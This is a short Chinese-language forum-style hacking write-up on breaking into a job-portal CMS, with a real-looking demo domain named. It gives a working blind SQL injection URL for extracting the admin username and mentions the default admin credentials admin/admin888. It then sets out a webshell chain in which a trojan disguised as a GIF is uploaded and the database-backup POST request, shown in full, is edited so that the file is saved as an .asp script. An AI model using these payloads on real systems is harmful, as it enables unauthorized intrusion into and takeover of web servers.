猜值的SQL语句就写出一个就好了，判断job_admin中job_user的第一位

http://demo.finereason.com/person/person_sendresume.asp?sendresume=1&sendemail=1@1.com&step=send&resumeid=273 and (select top 1 asc(mid(job_user,1,1)) from job_admin)>65

结果发现官方演示站点的后台就是默认的admin和admin888,

    有了后台，看看怎么获取webshell吧！首先我们看的就是备份数据库了，我们发现备份数据中表单数据是不能修改的，我想这些应该是难不到我们的吧！看看我的操作，首先是在前台上船一个木马gif文件，然后在后台正常备份数据库抓包，修改post信息，主要修改如下：

原来数据：

(Content-Length: 117)
DBpath=%2Fdatabase%2Fjobcom.mdb&bkfolder=..%2FBackUp&bkDBname=20071216171500.mdb.bak&submit2=%B1%B8%B7%DD%CA%FD%BE%DD

修改后的：

(Content-Length: 133)
DBpath=%2FUpFiles%2FPerson%2F20071216171333.gif&bkfolder=..%2FBackUp&bkDBname=20071216171500.mdb.asp&submit2=%B1%B8%B7%DD%CA%FD%BE%DD

提交和获取的webshell

    嘉缘这套系统在安全方面较以前的2.15版本可以说是有很很大的提高，不过还是由于程序员的小小疏忽造成了注入漏洞的形成！如果朋友们喜欢挖掘的话还可以继续深入！如果朋友们感兴趣的话可以来论坛中找我，我的ID是Cool_wXd